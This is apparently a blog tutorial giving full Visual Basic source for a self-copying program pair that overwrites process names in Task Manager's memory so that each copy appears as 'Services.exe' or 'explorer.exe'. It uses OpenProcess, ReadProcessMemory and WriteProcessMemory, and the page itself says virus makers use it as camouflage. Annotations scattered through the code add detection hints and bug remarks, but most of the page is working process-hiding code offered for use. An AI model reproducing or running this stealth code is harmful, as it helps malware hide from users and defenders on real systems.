We will make a program that inserts a fake program name into the Task Manager. To change the name shown for our program, we read the Task Manager process's memory using the ReadProcessMemory API function, modify it, and write it back into the Task Manager using the WriteProcessMemory API function.
For example, the programs are named Ambarhalim.exe and Porsea.exe.
- Ambarhalim.exe will change the displayed name of Porsea.exe to Services.exe.
- Porsea.exe will change the displayed name of Ambarhalim.exe to explorer.exe.
This project was created using Visual Basic. The steps are as follows:
1. Run the Visual Basic program on your PC.
2. Make 1 listbox (Listbox1) and 1 timer (Timer1) in the form1.
3. Set interval timer value to 500 (0.5 seconds).
In the Form1 code window, enter the source code below.
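' Form_Load: runs once when Form1 is loaded.
'
' If the running executable is not already named "Ambarhalim" or "Porsea",
' it copies its own file to both of those names in its own directory,
' starts both copies, and terminates itself. When it is one of the two
' named copies, this handler does nothing further.
'
' Behaviour a defender can look for: one executable writing two copies of
' itself under different names next to the original, launching both, and
' then exiting, which leaves a pair of sibling processes with one parent.
'
' The page printed the Sub header and the first Dim on a single line; they
' are separate statements and are split here.
Private Sub Form_Load()
    Dim index1 As String        ' full path of the currently running executable
    Dim Ambarhalim As String    ' destination path of the first copy
    Dim Porsea As String        ' destination path of the second copy

    index1 = App.Path & "\" & App.EXEName & ".exe"
    Ambarhalim = App.Path & "\Ambarhalim.exe"
    Porsea = App.Path & "\Porsea.exe"

    ' App.EXEName carries no extension, so the comparison uses bare names.
    If App.EXEName <> "Ambarhalim" And App.EXEName <> "Porsea" Then
        FileCopy index1, Ambarhalim
        FileCopy index1, Porsea
        Shell Ambarhalim
        Shell Porsea
        End                     ' the original instance exits after launching the copies
    End If
End Sub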
In the Timer1 code window, enter the source code below.
' NOTE(review): the Sub header that opens this Timer1 handler is not on the
' page; only the body and the closing End Sub are shown.
'
' Runs on every Timer1 tick. The timer is switched off for the duration of
' the handler and switched back on at the end.
Timer1.Enabled = False
' When the current second is a multiple of 5, rebuild the process list via Update.
If Second(Now) Mod 5 = 0 Then Update
' Each copy targets the other one: the instance named Ambarhalim asks for
' "Porsea.exe" to be shown as "Services.exe", and the instance named Porsea
' asks for "Ambarhalim.exe" to be shown as "explorer.exe".
If App.EXEName = "Ambarhalim" Then Disguise "Porsea.exe", "Services.exe"
If App.EXEName = "Porsea" Then Disguise "Ambarhalim.exe", "explorer.exe"
Timer1.Enabled = True
End Sub
This project also needs a module file, so add one to the project. In the
Module1 code window, enter the source code below.
' Module-level declarations: Toolhelp32 snapshot flags, the process-entry
' record, the kernel32 imports, and two module variables shared by the
' routines in this module.
'
' Review note: a small binary that imports OpenProcess, ReadProcessMemory
' and WriteProcessMemory together with Toolhelp32 process enumeration is a
' combination worth examining during static triage, because it is the set
' needed to read and modify another process's memory.

' Snapshot flag combining the four individual flag bits 1, 2, 4 and 8.
Const TH32CS_SNAPALL = (&H1 Or &H2 Or &H4 Or &H8)
' Snapshot flag requesting the process list only.
Const TH32CS_SNAPPROCESS As Long = 2&
' Record filled in by Process32First / Process32Next for one process.
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
' Process identifier; used by this module as the key for each entry.
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
' Executable file name in a fixed 260-character buffer; callers in this
' module cut it at the first Chr(0).
szExeFile As String * 260
End Type
' Opens a handle to the process dwProcessID with the requested access mask.
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
' Toolhelp32 snapshot creation and iteration.
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
' Declared as a Sub, so the result of CloseHandle is not available to callers.
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
' Cross-process memory write and read. The last parameter of the
' ReadProcessMemory declaration is named lpNumberOfBytesWritten here although
' it receives the number of bytes read.
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' Process handle set by InitProcHack and used by REPSTRINGINPROC.
Private myHandle As Long
' Bracketed list of process IDs ("[pid][pid]...") recorded by the previous
' call to Disguise.
Private myproclist$
' Update: rebuilds Form1.List1 from a fresh Toolhelp32 snapshot.
'
' Each list item is the executable name of one process (the text of
' szExeFile up to the first Chr(0), or an empty string when no Chr(0) is
' found) and its ItemData holds the process ID. No value is assigned to the
' function name, so nothing meaningful is returned.
'
' NOTE(review): the setup steps on the page name the control "Listbox1",
' while this routine refers to Form1.List1.
Public Function Update()
    Dim snap As Long
    Dim entry As PROCESSENTRY32
    Dim more As Long
    Dim nulPos As Long
    Dim exeName As String

    Form1.List1.Clear

    snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
    entry.dwSize = Len(entry)       ' the API expects the record size to be filled in first

    more = Process32First(snap, entry)
    Do While more
        ' Cut the fixed-length name buffer at its terminator.
        nulPos = InStr(1, entry.szExeFile, Chr$(0))
        If nulPos > 0 Then
            exeName = Left$(entry.szExeFile, nulPos - 1)
        Else
            exeName = Left$(entry.szExeFile, 0)
        End If

        With Form1.List1
            .AddItem exeName
            .ItemData(.NewIndex) = entry.th32ProcessID
        End With

        more = Process32Next(snap, entry)
    Loop

    CloseHandle snap
End Function
' UNICODE: returns data with one Chr(0) inserted in front of every
' character, so the result is twice as long as the input. Despite the name,
' no character-set conversion is performed; the routine only interleaves
' NUL characters.
Private Function UNICODE(data As String) As String
    Dim pos As Integer
    Dim nul As String

    nul = Chr$(0)
    UNICODE = ""
    For pos = 1 To Len(data)
        UNICODE = UNICODE & nul & Mid$(data, pos, 1)
    Next pos
End Function
' InitProcHack: opens a handle to process pid with access mask &H1F0FFF and
' stores it in the module variable myHandle (0 when the open fails).
' Returns True when a handle was obtained, False otherwise.
'
' Review notes:
' - &H1F0FFF is the legacy all-access process mask. A request for it against
'   another process is recorded by process-access telemetry (for example
'   Sysmon Event ID 10, which logs source image, target image and the
'   granted access mask), so an unexpected source opening taskmgr.exe this
'   way is a usable detection signal.
' - Whatever myHandle held before is overwritten; no CloseHandle call on
'   myHandle appears anywhere in the visible code.
Private Function InitProcHack(pid As Long) As Boolean
    myHandle = OpenProcess(&H1F0FFF, False, pid)
    InitProcHack = (myHandle <> 0)
End Function
' REPSTRINGINPROC: scans the memory of process PIDX for the pattern built
' from Origin and overwrites every match with the pattern built from Recent.
'
' Parameters:
'   PIDX   - ID of the process whose memory is read and written.
'   Origin - name to look for.
'   Recent - name written in its place.
' Origin and Recent are handed to Corrective, which may modify them in place.
'
' Review notes:
' - The only process touched is the one opened through InitProcHack. Nothing
'   here changes the target program's file name or its entry in the system's
'   own process list, so any source that does not read this one process's
'   memory still reports the real name.
' - The handle in myHandle is not closed in this routine.
Private Sub REPSTRINGINPROC(PIDX As Long, Origin As String, Recent As String)
Dim SRCHSTRING As String
Dim REPSTRING As String
Dim startpos As Integer
Dim p As String
Dim bytewrite As Long
' Give up silently when the process cannot be opened.
If Not InitProcHack(PIDX) Then Exit Sub
Dim c As Integer
Dim addr As Long
Dim buffer As String * 30000
Dim readlen As Long
Dim writelen As Long
' Align the two names with the process list held in Form1.List1.
Corrective Origin, Recent
' Build the search and replacement patterns (a Chr(0) before each character).
SRCHSTRING = UNICODE(Origin)
REPSTRING = UNICODE(Recent)
' 4001 reads at base addresses addr * 20000, each asking for 20016 bytes,
' so consecutive windows overlap by 16 bytes.
For addr = 0 To 4000
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
' Only windows for which the read reported bytes are searched.
If readlen > 0 Then
startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
' Address of the match: window base plus zero-based offset inside the window.
' p is a String, so the number is stored as text and converted back by CLng.
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING, Len(REPSTRING), bytewrite)
' Move past this match; the position is recomputed here with Trim(SRCHSTRING).
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1
Wend
End If
Next addr
DoEvents
' Closes file number 1; no Open statement appears in the visible code.
Close #1
DoEvents
End Sub
' Corrective: adjusts scr and rep in place (VB passes them by reference by
' default, which is how the caller receives the adjusted values).
'
' 1. Each name is replaced by the first entry of Form1.List1 that matches it
'    case-insensitively, so it takes the spelling used in the list; a name
'    with no match is left as given.
' 2. If the two names then differ in length, Left(" ", difference) is
'    appended to the shorter one.
'
' No value is assigned to the function name.
Private Function Corrective(scr As String, rep As String)
    Dim idx As Integer
    Dim wanted As String

    ' Take the list's spelling of the source name, if it is listed.
    wanted = LCase(scr)
    For idx = 0 To Form1.List1.ListCount - 1
        If LCase(Form1.List1.List(idx)) = wanted Then
            scr = Form1.List1.List(idx)
            Exit For
        End If
    Next idx

    ' Same for the replacement name.
    wanted = LCase(rep)
    For idx = 0 To Form1.List1.ListCount - 1
        If LCase(Form1.List1.List(idx)) = wanted Then
            rep = Form1.List1.List(idx)
            Exit For
        End If
    Next idx

    ' Append to whichever name is shorter.
    If Len(scr) > Len(rep) Then
        rep = rep + Left(" ", Len(scr) - Len(rep))
    ElseIf Len(rep) > Len(scr) Then
        scr = scr + Left(" ", Len(rep) - Len(scr))
    End If
End Function
' Disguise: walks the current process list and, for every process named
' "taskmgr.exe" whose ID was not recorded by the previous call, runs
' REPSTRINGINPROC on it twice with Origin and Recent.
'
' Parameters:
'   Origin - name to be replaced inside the Task Manager process.
'   Recent - name to put in its place.
'
' State: myproclist$ holds the bracketed IDs seen by the previous call and is
' replaced at the end by the IDs seen in this call, so an instance that is
' still running on the next timer tick is skipped.
'
' Review notes:
' - The name test is a plain "=" against the lower-case literal
'   "taskmgr.exe"; no Option Compare statement is visible, so whether it is
'   case-sensitive cannot be confirmed from the page.
' - The snapshot handle in mySnapshot is not passed to CloseHandle anywhere
'   in this routine.
' - For incident response, a Task Manager window that was open while this
'   code ran cannot be relied on for process names; an independent source
'   should be used for that.
Public Sub Disguise(Origin As String, Recent As String)
Dim newproclist$
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long
newproclist$ = ""
myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
' First entry of the snapshot; the return value of Process32First is not checked.
Process32First mySnapshot, myProcess
' Only processes that were not in the previous call's list are examined.
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = "[" & myProcess.th32ProcessID & "]"
' Remaining entries: same check as above, repeated for each one.
While Process32Next(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend
' Remember this call's process IDs for the next call.
myproclist$ = newproclist$
End Sub
You are free to give this program any name. This example source code is often used by virus makers as camouflage so that the program is hard to find.
Keyword: Modifiers task manager list | How to hack task manager list | How to crack task manager list Tumpal Tambunan